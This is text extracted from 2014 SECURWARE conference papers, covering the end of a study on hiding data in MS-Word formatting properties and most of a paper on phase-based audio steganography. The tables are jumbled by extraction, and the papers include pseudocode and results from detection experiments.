With experiments, we obtained that RGB colours represented
with (R, G, B) components, where R, G, B > 249 can not be
distinguished from the white color (255, 255, 255). There are
216 different possibilities for colour, which can be used for
representing 7 bits. Combining these two techniques, we can
hide 28 bits, in the following way - 7 bits from left border
style, 7 bits from left border color, 7 bits from right border
style, and 7 bits from right border color.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
TABLE I.
C HARACTERISTICS OF THREE COVER DOCUMENTS
Document 1
Document 2
Pages
1
11
110
Words
340
2381
30907
Characters
2252
15493
190833
Paragraphs
13
82
802
Lines
42
328
3445
Sentences
Original size (B)
Document 3
21
134
2028
31122
923090
4589312
TABLE II.
C OMPARISON OF MAXIMAL NUMBER OF EMBEDDED
BITS / CHARACTERS IN OUR METHODS AND METHODS PRESENTED IN [32]
AND [33]
Document 1
Document 2
Document 3
2154
14823
182470
Invisible Characters
364
2515
31422
Percent of
Characters
Invisible
16,2
16,2
16,5
40
286
4704
Max No. of embedded
bits in Method 1
2252
15493
190833
Max No. of embedded
bits in Method 2
17232
118584
1459760
Max No. of embedded
bits in Method 3
364
2296
22456
Max No. of embedded
bits in Method 4
147
938
14196
Max No. of embedded
bits in [32]
8736
60360
754128
Max No. of embedded
characters in [33]
13
95
1568
Max No. of embedded
bits in [33]
104
760
12544
Characters without q, j,
p, q, y
Capital Letters
D. Method 4 - Sentence Borders
The final method uses sentence outside border for hiding
data. We use only 8 border style out of 16, because other 8
can be noticed by human reader, and only the smallest border
width of 0.25pt. Used border styles are wdLineStyleDashDot, wdLineStyleDashDotDot, wdLineStyleDashLargeGap,
wdLineStyleDashSmallGap, wdLineStyleDot, wdLineStyleInset, wdLineStyleOutset and wdLineStyleSingle. Each sentence
in the cover document can hide 7 bits, with 3 bits from outside
border style, and 4 bits from outside border color.
V. E XPERIMENTAL R ESULTS AND D ISCUSSIONS
Each new presented method has implementation in C♯
using the Microsoft.Office.Interop.Word namespace. Our implementation of these four methods, use 8 bits to represent an
extended ASCII character for all methods, except for the last,
were we use 7 bits to represent an ASCII character. For our
experiments, we use three types of MS-Word documents as
cover documents - short, medium and large documents, with
properties given in Table I.
For each cover document, we hide 10, 50, 100, 500, 1000,
and 5000 characters (if it is possible), and we measure the
size of the obtained stego document. Normally, the new size
is bigger than original size, and it is given in bytes and in
percent of increase of original size.
From the results in Tables III, IV and V, one can see that
all techniques have small impact of document size, less then
27
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
TABLE III.
E XPERIMENTAL RESULTS FOR D OCUMENT 1
10 characters
1000 characters
5000 characters
%
Size
%
Size
%
Size
%
Size
%
Size
%
Method 1
31448
1.01047
32347
1.03936
33390
1.04074
/
/
/
/
/
/
Method 2
31249
1.00408
31530
1.01310
31986
1.02776
34482
1.10796
37517
1.20548
/
/
Method 3
31295
1.00555
/
/
/
/
/
/
/
/
/
/
Method 4
31356
1.00751
/
/
/
/
/
/
/
/
/
/
10 characters
100 characters
500 characters
31122B
Size
TABLE IV.
50 characters
WITH ORIGINAL SIZE OF
E XPERIMENTAL RESULTS FOR D OCUMENT 2
1000 characters
5000 characters
%
Size
%
Size
%
Size
%
Size
%
Size
Method 1
923609
1.00056
924750
1.00179
925472
1.00258
934834
1.01272
946697
1.02557
/
/
Method 2
924243
1.00124
924605
1.00164
925180
1.00226
926341
1.00352
928582
1.00624
953474
1.03291
Method 3
923455
1.00039
924398
1.00141
924547
1.00157
/
/
/
/
/
/
Method 4
923587
1.00053
924013
1.00099
925290
1.00238
/
/
/
/
/
/
10 characters
100 characters
500 characters
923090B
Size
TABLE V.
50 characters
WITH ORIGINAL SIZE OF
E XPERIMENTAL RESULTS FOR D OCUMENT 3
50 characters
100 characters
WITH ORIGINAL SIZE OF
4589312B
1000 characters
5000 characters
Size
%
Size
%
Size
%
Size
%
Size
%
Size
%
Method 1
4589321
1.00000
4589363
1.00001
4591027
1.00037
4595001
1.00123
4605370
1.00349
4682285
1.02025
Method 2
4589313
1.00000
4589356
1.00000
4589574
1.00005
4592093
1.00060
4595782
1.00140
4608077
1.00408
Method 3
4589512
1.00004
4589567
1.00005
4589597
1.00006
4591231
1.00041
4593443
1.00090
/
/
Method 4
4589376
1.00001
4589396
1.00011
4591778
1.00010
4595859
1.00142
4603958
1.00319
/
/
1.206% for Document 1, less then 1.033% for Document 2,
and less then 1.021% for Document 3 for evaluated message
lengths. Method 2 has the smallest influence on the size for
the short and large documents, and Method 3 has the smallest
influence on the size for the medium document.
From the Table II, one can see that Method 2 has the
highest embedding capacity, followed by Method 1, and the
smallest embedding capacity has Method 4. The number of
invisible characters is only a small portion of the number of
all characters in every document, and in our three documents
is less then 17% (see Table II). So, if we compare our Method
2 with the method introduced by Khairullah [32] (Table II),
we can embed more characters by Method 2. One can see that
for all three documents, the maximal number of embedded
bits by [32] (’number of invisible characters’ ×24) is almost a
half than the maximal number of embedded bits by Method 2
(’number of characters, without q, p, j, y, and g’ ×8). For the
method proposed by Bhaya et al. in [33], we have that three
consecutive capital letters in the document serve to embed one
character, so, the maximal number of embedded bits depends
strongly of number of capital letters. If we use 8 bits per
character, we have that this method has the smallest embedding
capacity compared to other analyzed methods (Table II). Even
in the case that all characters are capital letters, we can embed
almost three times less characters, than in the case of Method
2. Bhaya et al. in [33] suggested to use only three similar font
types, which limits the maximal number of different characters
that can be embedded to 27. This can be changed if we use
four or five similar font types, resulting in up to 64 and 125
different characters. But finding bigger number of similar fonts
is very difficult, and at the end, user may notice the differences
in the font used for capital letters. Additional problem can arise
if non-Latin language is used and if selected font is not present
on the machine. For example, if you use Cyrillic letters, and
font is not present, the capital letters will be displayed as Latin,
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
500 characters
%
Figure 1.
Detection of hiding with Method 2 and 3 by changing page
background color
and coding will be visible to human eyes.
A. Robustness and Steganalysis
Some of the text steganography methods like line shift
coding, word shift coding, and luminance modulation coding
are robust to document printing and scanning, but have low
embedding rates. Other methods, like open method, have
higher embedding rates, but are less or not robust at all against
document printing and scanning. Property coding belongs to
second group, and it is not robust at all against document
printing and scanning. Property Coding is resistant to save
actions, compared to two methods presented in [35], and also
has smaller overhead compared to other two methods from
[35].
Hidden text with Property Coding can be changed or
destroyed by text editing. The presence of Methods 2, 3, and
4 can be easily detected if somebody changes intentionally
the background color of the document, causing the borders
and underlining to became visible (see Figure 1). Method 1 is
resistant to this kind of attack.
Property Coding is not entirely suitable for copyright
protection applications where robust data-hiding is required,
because the attacker can always use Optical Character Recog-
28
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
nition (OCR) to completely remove the hidden data.
VI. C ONCLUSION
Four new format based methods specially designated for
hiding data in MS-Words documents are given. Because they
change the properties of some document objects offered by
MS-Word, we called the new type of methods Property Coding.
These methods are resistant to saving actions, introduce very
small overhead on the document size, and can embed up to 8
bits per character.
[1]
[2]
[3]
[4]
[5]
[6]
[7]
[8]
[9]
[10]
[11]
[12]
[13]
[14]
[15]
R EFERENCES
I. J. Cox, M. L. Miller, J. A. Bloom, J. Fridrich, and T. Kalker, Eds.,
Digital Watermarking and Steganography. Elsevier Inc., Burlington,
MA, 2008, ISBN: 978-0-12-372585-1.
H. Singh, P. K. Singh, and K. Saroha, “A Survey on Text Based
Steganography,” in Proceedings of the 3rd National Conference
INDIACom-2009 2009, New Delhi, India, 2009, pp. 3–9.
M. Agarwal, “Text Steganographic Approaches: A Comparison,” International Journal of Network Security & Its Applications, vol. 5(1),
2013, pp. 91–106.
M. J. Atallah et al., “Natural language watermarking: design, analysis,
and a proof-ofconcept implementation,” in Proceedings of the 4th
International Workshop on Information Hiding April 25-27, 2001,
Pittsburgh, USA. Springer Berlin Heidelberg, Apr. 2001, pp. 185–
200, Moskowitz, I. S., Ed., LNCS: 2137, ISBN: 978-3-540-45496-0.
M. Atallah et al., “Natural Language Watermarking and Tamperproofing,” in Proceedings of the 5th International Workshop on Information
Hiding October 7-9, 2002, Noordwijkerhout, Netherlands. SpringerVerlag Berlin Heidelberg, Oct. 2003, pp. 196–212, Petitcolas , F. A. P.,
Ed., LNCS: 2578, ISBN: 3-540-00421-1.
M. Topkara, C. M. Taskiran, and E. J. Delp, “Natural language watermarking,” in Proceedings of the SPIE Electronic Imaging: Security,
Steganography, and Watermarking of Multimedia Contents VII, 2005,
vol. 5681, 2005, doi: 10.1117/12.593790.
K. Bennett, “Linguistic steganography: Survey, analysis, and robustness
concerns for hiding information in text,” 2004, cERIAS Tech Report
2004-13.
S. H. Low, N. F. Maxemchuk, J. T. Brassil, and L. O‘Gorman, “Document marking and identification using both line and word shifting,”
in Proceedings of the 14th Annual Joint Conference of the IEEE
Computer and Communications Societies (INFOCOM ‘95) April 2-6,
1995, Boston, Massachusettes, Apr. 1995, pp. 853–860.
J. T. Brassil, S. Low, N. F. Maxemchuk, and L. O‘Gorman, “Electronic
Marking and Identification Techniques to Discourage Document Copying,” IEEE Journal on Selected Areas in Communications, vol. 13 (8),
1995, pp. 1495–1504.
J. T. Brassil, S. Low, and N. F. Maxemchuk, “Copyright protection for
the electronic distribution of text documents,” Proceedings of the IEEE,
vol. 87 (7), 1999, pp. 1181–1196.
Y. Kim, K. Moon, and I. Oh, “A Text Watermarking Algorithm based
on Word Classification and Interword Space Statistics,” in Proceedings
of the 7th International Conference on Document Analysis and Recognition (ICDAR‘03) August 3–6, 2003, Edinburgh, Scotland. IEEE
Computer Society Washington, DC, USA, Aug. 2003, pp. 775–779.
M. Shirali-Shahreza and S. Shirali-Shahreza, “A New Approach to Persian/Arabic Text Steganography,” in Proceedings of the 5th IEEE/ACIS
international Conference on Computer and Information Science and 1st
IEEE/ACIS July 2006, Honolulu, USA, Jul. 2006, pp. 310–315.
M. Aabed, S. Awaideh, A.-R. Elshafei, and A. Gutub, “Arabic Diacritics Based Steganography,” in Proceedings of the IEEE International
Conference on Signal Processing and Communications (ICSPC 2007)
November 24–27, 2007, Dubai, UAE, Nov. 2007, pp. 756–759.
A. A. Gutub, L. M. Ghouti, Y. S. Elarian, S. M. Awaideh, and A. K.
Alvi, “Utilizing Diacritic Marks for Arabic Text Steganography ,”
Kuwait Journal of Science & Engineering, vol. 37 (1), 2010, pp. 1–
16, ISSN: 1024-8684.
W. Bender, D. Gruhl, N. Morimoto, and A. Lu, “Techniques for data
hiding,” IBM Systems Journal, vol. 35, 1996, pp. 313–336.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
[16] A. M. Alattar and O. M. Alattar, “Watermarking electronic text documents containing justified paragraphs and irregular line spacing,” in
Proceedings of the SPIE - Security, Steganography, and Watermarking
of Multimedia Contents VI June, 2004, San Jose, California, USA.
Society of Photo Optical, Jun. 2004, pp. 685–695.
[17] M.
Kwan,
“The
SNOW
Home
Page,”
2006,
URL:
http://www.darkside.com.au/snow/ [accessed: 2014-03-03].
[18] L. Y. Por and B. Delina, “Whitesteg: a new scheme in information
hiding using text steganography,” WSEAS Transaction on Computers,
vol. 7, 2008, pp. 735–745.
[19] L. Y. Por, K. Wong, and K. O. Chee, “UniSpaCh: A text-based data
hiding method using Unicode space characters,” The Journal of Systems
and Software, vol. 85, 2012, pp. 1075–1082.
[20] C. Chen, S. Z. Wang, and X. P. Zhang, “Information Hiding in Text
Using Typesetting Tools with Stego-Encoding,” in Proceedings of the
First International Conference on Innovative Computing, Information
and Control August 30 - September 1, 2006, Beijing, China, 2006, pp.
459–462.
[21] I.-C. Lin and P.-K. Hsu, “A Data Hiding Scheme on Word Documents using Multiple-base Notation System,” in Proceedings of the
6th International Conference on Intelligent Information Hiding and
Multimedia Signal Processing (IIH-MSP‘10) October 15-17, 2010,
Darmstadt, Germany, Oct. 2010, pp. 31–33.
[22] P. V. K. Borges and J. Mayer, “Document Watermarking via Character
Luminance Modulation,” in Proceedings of the IEEE International
Conference of Acoustics, Speech and Signal Processing (ICASSP 2006)
May 14–16, 2006, Toulouse, France, Jul. 2006, pp. II–317, ISBN: 14244-0469-X.
[23] A. K. Bhattacharjya and H. Ancin, “Data embedding in text for a copier
system,” in Proceedings of the IEEE International Conference on Image
Processing (ICIP 99) October 24-28, 1999, Kobe, Japan, Oct. 1999, pp.
245–249.
[24] R. Villán et al., “Text Data-Hiding for Digital and Printed Documents: Theoretical and Practical Considerations,” in Proceedings of
the SPIE Electronic Imaging: Security, Steganography, and Watermarking of Multimedia Contents VIII, 2006, vol. 6072, 2006, doi:
10.1117/12.641957.
[25] A. Gutub and M. Fattani, “A Novel Arabic Text Steganography Method
Using Letter Points and Extensions,” in Proceedings of the WASET International Conference on Computer, Information and Systems Science
and Engineering (ICCISSE), vol. 21 May, 2007, Vienna, Austria, May
2007, pp. 28–31.
[26] P. Wayner. Elsevier Inc., 2009, 3rd edition, ISBN: 978-0-12-374479-1.
[27] B. Murphy and C. Vogel, “The syntax of concealment: reliable methods
for plain text information hiding,” in Proceedings of the SPIE International Conference on Security, Steganography, and Watermarking of
Multimedia Contents 2007, vol. 6505, 2007, doi: 10.1117/12.713357.
[28] Nakagawa, H. and Matsumoto, T. and Murase, I., “Information
Hiding for Text by Paraphrasing,” 2002, URL: http://www.r.dl.itc.utokyo.ac.jp/ nakagawa/academic-res/finpri02.pdf [accessed: 2014-0303].
[29] M. Shirali-Shahreza, “Text Steganography by Changing Words
Spelling,” in Proceedings of the 10th International Conference on
Advanced Communication Technology (ICACT 2008) February, 2008,
Kitakyushu, Japan, vol. 3, Feb. 2008, pp. 1912–1913.
[30] M. Niimi, S. Minewaki, H. Noda, and E. Kawaguchi, “A Framework
for a Simple Sentence Paraphrase Using Concept Hieararchy in SDForm Semantics Model,” in Proceedings of the 13th European-Japanese
Conference on Information Modelling and Knowledge Bases (EJC
2003), June 3-6, Kitakyushu, Japan. IOS Press, 2004, pp. 55–66.
[31] M. Topkara, U. Taskiran, and M. J. Atallah, “Information Hiding
Through Errors: A Confusing Approach,” in Proceedings of the SPIE
Electronic Imaging: Security, Steganography, and Watermarking of
Multimedia Contents 2007, vol. 6505, 2007, doi: 10.1117/12.706980.
[32] M. Khairullah, “A Novel Text Steganography System Using Font
Color of the Invisible Characters in Microsoft Word Documents,” in
Proceedings of the Second International Conference on Computer and
Electrical Engineering (ICCEE ’09) December, 2009, Dubai, Dec. 2009,
pp. 482–484, ISBN: 978-0-7695-3925-6.
[33] W. Bhaya, A. M. Rahma, and D. Al-Nasrawi, “Text Steganography
29
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
[34]
[35]
based on Font Type in MS-Word Documents,” Journal of Computer
Science, vol. 9 (7), 2013, pp. 898–904, ISSN: 1549-3636.
T.-Y. Liu and W.-H. Tsai, “A New Steganographic Method for Data
Hiding in Microsoft Word Documents by a Change Tracking Technique,” IEEE Transactions on Information Forensics and Security, vol.
2 (1), 2007, pp. 24–30.
A. Castiglione, B. D’Alessio, A. De Santis, and F. Palmieri, “New
steganographic techniques for the OOXML file format,” in Proceedings
of the IFIP WG 8.4/8.9 international cross domain conference on
Availability, reliability and security for business, enterprise and health
information systems August 22-26, 2011, Vienna, Austria. Springer,
Aug. 2011, pp. 344–358, Tjoa, A. M., Quirchmayr, G., You, I., Xu, L.
Eds., LNCS: 6908, ISBN: 978-3-642-23299-2.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
30
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Audio Steganograpgy by Phase Modification
Fatiha Djebbar
Beghdad Ayad
UAE University
College of Information Technology
AL Ain, UAE
Email: fdjebbar@uaeu.ac.ae
University of Wollongong in Dubai
Faculty of Engineering and Information Science
Dubai, UAE
Email: beghdadayad@uowdubai.ac.ae
Abstract—In this paper, we propose a robust steganographic
system that embeds high-capacity data in phase spectrum. Our
approach is based on the assumption that partial alteration of
selected frequency bins in the phase spectrum leads to a smooth
transition while preserving phase continuity. The frequency bins,
in the phase, selected for data hiding are first defined in the
magnitude through an election process and then mapped into the
phase spectrum to embed data. Perceptual and statistical study
results demonstrate that, in comparison with a recently proposed
magnitude based audio steganography method, the phase based
approach gains a considerable advantage against steganalysis
attacks while giving similar or comparable hiding capacity and
audio quality.
Keywords–Information hiding; Phase Coding; Steganalysis.
I.
I NTRODUCTION
Digital audio steganography has emerged as a prominent source of data hiding across novel telecommunication
technologies such as voice-over-IP and audio conferencing.
Currently, three main methods are being used: cryptography,
watermarking, and steganography. Encryption techniques are
based on rendering the content of a message garbled to
unauthorized people. In watermarking, data is hidden to convey
some information about the cover medium such as ownership
and copyright, where the hidden message could be visible
or invisible. The primary goal of steganography consists of
undetectably modifying a multimedia file to embed these data
[1]. While steganography is about concealing the existence of
’hidden message’, steganalysis is about detecting its existence
[2]. Steganalysis, the counterpart of steganography, is regarded
as ”attacks” to break steganography algorithms by the mean of
different audio processing and statistical analysis approaches.
Steganography in today’s computer era is considered a
sub-discipline of the data communication security domain.
Lately, new directions based on steganographic approaches
started to emerge to ensure data secrecy. Modern techniques of
steganography exploit the characteristics of digital media by
utilizing them as a carrier (cover) to hold hidden information.
Covers can be of different types including image [4], audio
[5], video [6], text [7], and IP datagram [8].
Several methods of audio data hiding have been proposed,
whether in time or frequency domains, including low-bit coding, spread spectrum coding, phase coding, echo data hiding,
etc [1]. To hide information within audio signals, [9][10] have
designed a steganographic algorithm by manipulating higher
LSB layers of the audio signal. Phase alteration and spread
spectrum are used in [11][12]; wavelet coding is used in
[13][14] and magnitude-based data hiding was proposed by
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
[15]. Most of these methods take information hiding ratio as
a major factor in evaluating the robustness of their algorithms.
As it is generally expected, higher information-hiding ratio
elevates the risk of detecting the presence of hidden data.
In this paper, we present a robust phase coding technique
for digital audio steganography. The original contributions of
the paper addresses mainly the undetectability issue of hidden
data encountered in our previous work, where magnitude was
solely considered [15]. The phase spectrum is explored, in
particular, to benefit from the inherent advantages of phase
data hiding, as it is commonly understood that, when phase
coding can be used, it gives better signal to noise ratio [1].
Our work is supported by a thorough comparative study by
steganalysis to judge the performance of our steganographic.
The comparison is performed against our previously presented
algorithm [15] and existing high capacity LSBs-based audio
steganographic software: Steghide, S-Tools and Hide4PGP
found respectively in [16]–[18]. Perceptual evaluation as well
as the steganalysis study show that the resulting stego stream
preserves the naturalness of the original signal and resists
steganalysis attacks while achieving similar or comparable
hiding capacity to that in [15].
The rest of the paper is organized as follows. Phase hiding
algorithm is presented in Section II. Section IV describes
the steps developed to recover the embedded message at the
receiver’s end. Section V presents the simulation experiments
and subsequent evaluation results. Finally, we conclude our
paper with a summary of our work and some future directions
in Section VI.
II.
M OTIVATION AND BACKGROUND
The particular importance of hiding data in audio files
results from the prevailing presence of audio signal as an
information vector in our human society. Data hiding in audio
files is especially challenging because of the sensitivity of
Human Auditory System (HAS). Alterations of an audio signal
for data embedding purposes may affect the quality of that
signal. However, data hiding in the frequency domain rather
than time domain is of nature to provide better results in
terms of signal to noise ratio [10]. In addition, Human auditory
perception has certain particularities that must be exploited for
hiding data efficiently. For example, our ability to resolve tones
decreases with the increase of frequency of the tone. Thus, it is
more effective for hiding data in the higher frequency regions
than in low frequencies [19].
In audio signals sampled at 16 kHz and quantized at 16
bits, frequencies within the range of 50 Hz to 7 kHz are then
31
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
eligible to embed data. The cover audio is divided into M
equal length frames. For a sampling frequency of 16 kHz, a
4 ms frame for example produces 64 samples. The resolution
of each frequency component is equal to 16000/64 = 250Hz.
Thus, the first frequency component that could be used for
hiding data will be 250 Hz instead of 50 Hz (the starting
frequency of wide-band speech). If we consider the Fourier
symmetry feature of the spectrum, the number of normalized
frequencies or the number of locations to hide data within
each frame will be from FHDmin = 1 to FHDmax = 28
in [0.25 7] kHz frequency band. In each selected energetic
frequency component location, at least a bit from the payload
is embedded.
for m = 1 to M do
for n = 1 to N/2 do
|φs (m, n)| ← |φc (m, n)|
end for
for k = FHDmin to FHDmax do
if 10 ∗ log10 (|Sc (m, k)|) ≥ thresholddB then
if ∆(m, k)dB ≥ CLSBdB then
|φs (m, k)| ← |φc (m, k)| + δ(m, k)
end if
end if
end for
end for
Figure 1: Algorithm used to compute |φs (m, k)|
III.
P ROPOSED HIDING ALGORITHM
In our scheme, the cover-signal is divided into M frames of
4 ms, each contains N samples, sc (m, n), 1 ≤ m ≤ M and
1 ≤ n ≤ N . The magnitude spectrum |Sc (m, k)| is isolated
by transforming each frame to frequency domain using Fast
Fourier Transform (FFT), Sc (m, k) = F F T (sc (m, n)). The
hiding band is specified by FHDmin ≤ k ≤ FHDmax , where
FHDmin and FHDmax are the minimum and the maximum
hiding band locations. In our algorithm, we only select high
energy frequency components in an attempt to minimize the
embedding distortion. A threshold value is set for that purpose where a frequency bin is selected for data hiding only
if its energy is higher or equal to the threshold value. Data is
embedded along a chosen LSB layer (CLSB) to ∆(m, k)dB .
Where CLSB is the LSB layer lower-limit for hiding in a
frequency bin. In our experiments, CLSB is chosen to be
the 5th LSB layer at minimum. The ∆ value models the
upper limit for data hiding in a selected bin. ∆ value is set
to impose a good quality on the stego-audio. The selection
process of frequency bins done in the magnitude spectrum as
well as the hiding locations are summarized in Figure 2. the
details of the embedding process in a selected frequency bin
is described in Figure 3. The value of ∆(m, k)dB is set to
(|Sc (m, k)|)dB − 13dB. In doing so, we benefit from the fact
that noise that is 13 dB below the original signal spectrum for
all frequencies is inaudible [20]. Even though the frequency
bins qualified for data hiding are selected in the magnitude
spectrum, we believe that we will benefit also from mapping
it to the phase spectrum for the following reasons:
1)
2)
3)
As we partially alter selected frequency bins, only
few bits in each selected frequency component are
modified, which will give a smooth transition while
preserving phase continuity.
When phase coding can be used, it gives better signal
to noise ratio [20].
Opportunities to increase hiding capacity are worth
to be explored
To embed in the phase spectrum, we map the exact selected
frequency bins from the magnitude spectrum into the phase
spectrum φ(m, k) and data is also embedded along CLSB layer
to ∆(m, k)dB . Embedding data in phase spectrum is described
as follows:
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
In Figure 1, the value of δ(m, k) represents the
modification in the phase value. A full description of
the phase modification induced by embedded bits in a given
frequency component is shown in Figure 3. The number
of injected bits in a frequency component depends on its
energy. In this manner, the embedding in a given frequency
bin in |φs (m, k)| ← |φc (m, k)| + δ(m, k) is redefined as:
|φc (m, k)| = (an 2n + an−1 2n−1 + an−2 2n−2 + ....a2 22 +
a1 21 + a0 20 )
Where an = {0, 1} and δ(m, k) = (di 2i + di−1 2i−1 +
... + d0 20 ). The value of stego-phase can be simply calculated
using:
|φs (m, k)| = (an 2n + an−1 2n−2 + di 2i + ....d1 21 + d0 20 +
a1 21 + a0 20 )
Finally, the new phase is multiplied with its magnitude to produce the stego-spectrum such as: Ss (m, k) =
|Sc (m, k)|ejφs (m,k) . The inverse iF F T transformation is applied on the segment to get the new stego-audio segment
ss (m, n).
Figure 2: Spectral embedding area located in a frequency frame.
IV.
H IDDEN DATA RETRIEVAL
To extract the hidden data from the phase spectrum, two
main steps are followed: first, we locate the bins used for
data embedding from the magnitude part |Ss (m, k)|. To do
so, the parameters impacting the location of embedding in
each selected bin such as T hreshold, ∆(m, k), CLSB are
32
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Figure 3: Embedding process in a selected frequency bin.
computed in the same way as done at the sender end. Second,
we map the embedding locations found in the magnitude to
the phase spectrum. Segments of the secret data are extracted
and then reassembled as follows:
for m = 1 to M do
for n = 1 to N/2 do
|φs (m, n)| ← |φc (m, n)|
end for
for k = FHDmin to FHDmax do
if 10 ∗ log10 (|Sc (m, k)|) ≥ thresholddB then
if ∆(m, k)dB ≥ CLSBdB then
Extract δ(m, k) from |φs (m, k)|
end if
end if
end for
end for
Figure 4: Algorithm used to extract δ(m, k)
V.
capacity while maintaining audio quality quality, i.e, Threshold
= -20dB, ρ= 15dB, CLSB=1, FHDmin and FHDmax are set
to 1 and 28 for 4ms frame length.
In our simulation, the distortion between stego and cover
audio signals is calculated over several frames and by averaging the statistics, the overall measure is obtained. SegSN R
value for one modified audio frame of 4 ms is given by the
following equation:
(
SegSN RdB=10 log10 ∑28
∑28
k=1
k=1
|Sc (m, k)|2
)
|Sc (m, k) − Ss (m, k)|2
(1)
The summation is performed over the signal per frame
basis. To evaluate the results, the following criteria were
used. First, the capability of embedding larger quantity of
data (Kbps) is sought while naturalness of the stego-audio is
retained. Second, the hidden data is fully recovered from the
stego audio-signal.
P ERFORMANCE EVALUATION
To evaluate the performance of the proposed algorithm,
we conducted a comparative study between stego- and coveraudio signals. The study is based on (1) perceptual and (2)
steganalysis undetectability.
TABLE I: PERFORMANCE EVALUATION AND COMPARISON
Hiding Method
SN RdB
PESQ
[15]
26.86
4.32
Proposed
32.31
4.48
A. Perceptual undetectability
In this section, we assess the quality of the stego-audio,
when the hiding capacity is maximized. Tests have been
conducted for magnitude [15] and the proposed phase configuration. Perceptual evaluation of speech quality (P ESQ)
measure defined in the ITU-T P862.2 standard combined with
segmental SNR (SegSN RdB ) were utilized for the objective
evaluation [21]. The hiding Rate(Kbps) achieved is computed
accordingly. Tests are carried out on a set of 100 audio waves,
spoken in different languages by male and female speakers.
Audio signals are 10s length each and sampled at 16 kHz and
data is embedded within [0.25-7] kHz band with maximum
hiding ratio of 23 kbps.
The PESQ test produces a value ranging from 4.5 to 1. A
PESQ value of 4.5 means that the measured audio signal has
no distortion: it is exactly the same as the original. A value
of 1 indicates the severest degradation. The effectiveness of
our algorithm is evaluated on audio frames sampled at 64. We
set the algorithm parameters’ value to maximize the hiding
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
The values of SNR and PESQ registered in Table I are
obtained from frames of 4 ms, hiding ration 23 Kpbs and 5th
LSB layer. They indicate clearly that stego-signals generated
by the proposed phase embedding approach have experienced
less distortion compared to [15]. Moreover, phase coding is
robust to common linear signal manipulation such as: amplification, attenuation, filtering and resampling.
B. Comparative study by steganalysis
To further investigate our steganography algorithm performance, a comparative study by steganalysis is conducted
based on a state-of-the-art reference audio steganalysis method
[3]. The comparison is performed against our magnitude
data hiding [15] and existing audio steganographic software:
Steghide, S-Tools and Hide4PGP found respectively in [16]–
[18]. The selected reference method was applied successfully
in detecting the presence of hidden messages in high capacity
LSBs-based steganography algorithms [3]. It is based on
33
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
extracting Mel-cepstrum coefficients (or features) from the
second order derivative of audio signals. The features are then
fed to a support vector machine (SVM) with RBF kernel [22]
to distinguish between cover- and stego-audio signals.
For each studied steganography tool and algorithm, two
datasets are produced: training and testing. Each dataset contains 270 stego and cover WAV audio signals of 10s length.
All signals are sampled at 44.1 kHz and quantized at 16bits. Each training and testing dataset contains 135 positive
(stego) and 135 negative (cover) audio samples. We used online audio files from different types such as speech signals in
different languages (i.e, English, Chinese, Japanese, French,
and Arabic), and music (classic, jazz, rock, blues).
All stego-audio signals are generated by hiding data from
different types: text, image, audio signals, video and executable files. To make a fair comparison between all assessed
algorithms, the cover-signals were embedded with the same
capacity of data. More precisely, S-Tools’s (with hiding ratio
of 50%) hiding capacity is used as a reference to embed the
candidate steganographic algorithms and tools. The performance of each steganographic algorithm is measured through
the levels by which the system can distinguish between stego
and cover-audio signals (Table III). In order to analyze the
obtained results, we first present the contingency table (see
Table II).
are interpreted as high-detection rate. Consequently, the proposed method show a significant improvement over the other,
whereby, we were able to add a considerable accuracy to our
steganographic algorithm against steganalysis attacks. The fact
that the phase embedding scheme was able to perform better
than the other algorithms, shows that the distortion amount
resulting from embedding similar embedding ratios is much
smaller.
TABLE III: OVERALL ACCURACY STEGANALYSIS RESULTS
Cover-signal
False negatives (fn)
Cover classified
False positives (fp)
True negatives (tn)
tn: cover-audio classified as cover-audio signal
•
fn: stego-audio classified as cover-audio signal
•
fp: cover-audio classified as stego-audio signal
tp + tn
all
0.775
proposed
0.575
0.4
Hide4PGP
[15]
Stool
Steghide
proposed
0.2
0.2
0.4
0.6
0.8
1
False Positive Rate
Figure 5: ROC curves for steganographic methods [15]–[18] and the proposed
algorithm.
(2)
In our second experimental work, we assess the performance evaluation of our algorithm and compare it to [15]–
[18]. The values presented in Table III are the percentages
of stego-audio signals correctly classified. Higher score values
ISBN: 978-1-61208-376-6
0.85
[15]
0.6
0
The receiver operating characteristic (ROC) value is the
fraction of true positive (TPR= true positive rate equivalent
to Sensitivity) versus the fraction of false positive (FPR=
false positive rate equivalent to 1-Specificity). Following the
preparation of the training and testing datasets, we used the
SVM library tool available at [23] to discriminate between
cover- and stego-audio signals. The results of the comparative
study are reported in Table III. The accuracy of each studied
tool and method is measured by the values of AC and ROC.
Copyright (c) IARIA, 2014.
0.67
0
In subsequent formulas, all represents the number of positive and negative audio signals. The value of the information
reported in Table II is used to calculate the following measures:
Accuracy(AC) =
Steghide
Hide4PGP
0.8
The entries of the contingency table are described as
follows:
• tp: stego-audio classified as stego-audio signal
•
0.725
1
True Positive Rate
Stego-signal
True positives (tp)
AC
Stools
Further details on the behavior of each algorithm are
represented in term of ROC curves in Figure 5. In each graph, a
higher curve corresponds to more accurate detection rate while
a lower curve corresponds to low accurate detection rate.
TABLE II: THE CONTINGENCY TABLE
Stego classified
Hiding methods
For the second experiment we further investigate the performance of our algorithm when the dataset contains only speech
or music signals. The aim of this experiment is to put more
emphasis on the behavior of the proposed algorithm when
music audio-signals are used to convey hidden data versus
those of speech audio-signals. We split the dataset into two
sets A (130 speech signal) and B (130 music signal). Each
set is further split to 65 stego- and 65 cover-signal to create a
training and testing dataset for speech as well as for music. A
set up similar to that described for experiment 1 was employed.
The overall results in Table IV and Figure 6, show that our
method performs better whether for speech- or music-signals.
Our finding shows also that data-hiding in music Figure (6b)
is less detectable than in speech-signals Figure (6a). In fact,
